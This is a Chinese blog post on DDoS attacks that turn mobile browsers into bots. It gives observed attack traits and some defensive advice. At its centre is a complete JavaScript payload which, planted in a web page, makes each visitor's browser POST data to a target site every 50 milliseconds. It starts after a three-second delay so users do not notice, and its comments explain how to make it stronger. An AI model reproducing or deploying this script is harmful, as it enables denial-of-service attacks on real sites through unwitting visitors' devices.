DDoS攻击新趋势:海量移动设备成为新一代肉鸡
通过监测到的数据发现,这类攻击有以下几个特点:
- 移动端设备系统分布均匀:iOS系统约占四成,Android系统六成;
- 攻击规模和肉鸡数量庞大且源IP不固定:单次攻击峰值达百万QPS(每秒请求次数),来源于50多万个肉鸡源IP,且多次攻击事件之间源IP重合度非常低;
- 攻击源IP分布极散:攻击源IP分散于全球160余个国家,近40个运营商,仅中国就有300余个城市存在攻击源,且多数分布在东部及沿海网络发达的省份;
代码呈上
<script type="text/javascript">
var t_postdata='id=datadatadatadatadata';//任意字符,数据越大攻击效果越好。
var t_url='http://www.xxx.com/test.php';//目标站,可post其需要处理的URL令其负载过大
function c_xmlHttp()
{
if(window.ActiveXObject)
{
xmlHttp=new ActiveXObject('Microsoft.XMLHTTP');
}
else if(window.XMLHttpRequest)
{
xmlHttp=new XMLHttpRequest();
}
return xmlHttp;
}
function post_send()
{
var xmlHttp=c_xmlHttp();
xmlHttp.open("POST",t_url,true);
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
xmlHttp.send(t_postdata);
r_send();
}
function r_send()
{
setTimeout("post_send()", 50);//50毫秒一次,可改小,令威力加大
}
if(!+[1,])//IE下不执行。
{var fghj=1;}
else
{setTimeout("post_send()", 3000);}//访问网站3秒后再执行攻击,这样用户就毫无感觉。
</script>
如何应对这种新兴DDoS攻击威胁?
目前尚无太好的办法对付这种CC,下面是一些方法:
提高服务器并发能力,容纳攻击者
限速节流+拉闸IP/IP段
上带有WAF的CDN,过滤流量
更高级的流量清洗
用户尽量少访问无备案的非正规网站,不下载未知APP即使他说的条件多么诱人。部分APP的广告以弹窗提示中病毒,请立即关闭该页面,如无法关闭请关闭浏览器,您的设备在下载APP前仍是安全的。
发现流量不对劲立即查杀自己的设备有没有访问恶意网站/安装了恶意应用。
请使用这种无赖的攻击方式的攻击者好自为之,有因必有果。
来源:https://www.gymxbl.com/1678.html
Tags : 本文未设置标签
「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」
(๑>ڡ<)☆谢谢老板们的投食~
使用微信扫描二维码完成支付

手机阅读
所有原创文章采用 知识共享署名-非商业性使用 4.0 国际许可协议 进行许可。
您可以自由的转载和修改,但请务必注明文章来源并且不可用于商业目的。
本站部分内容收集于互联网,如果有侵权内容、不妥之处,请联系我们删除。敬请谅解!
关注微信公众号『丰烨地毯』
第一时间了解最新地毯信息
关注官微不迷路~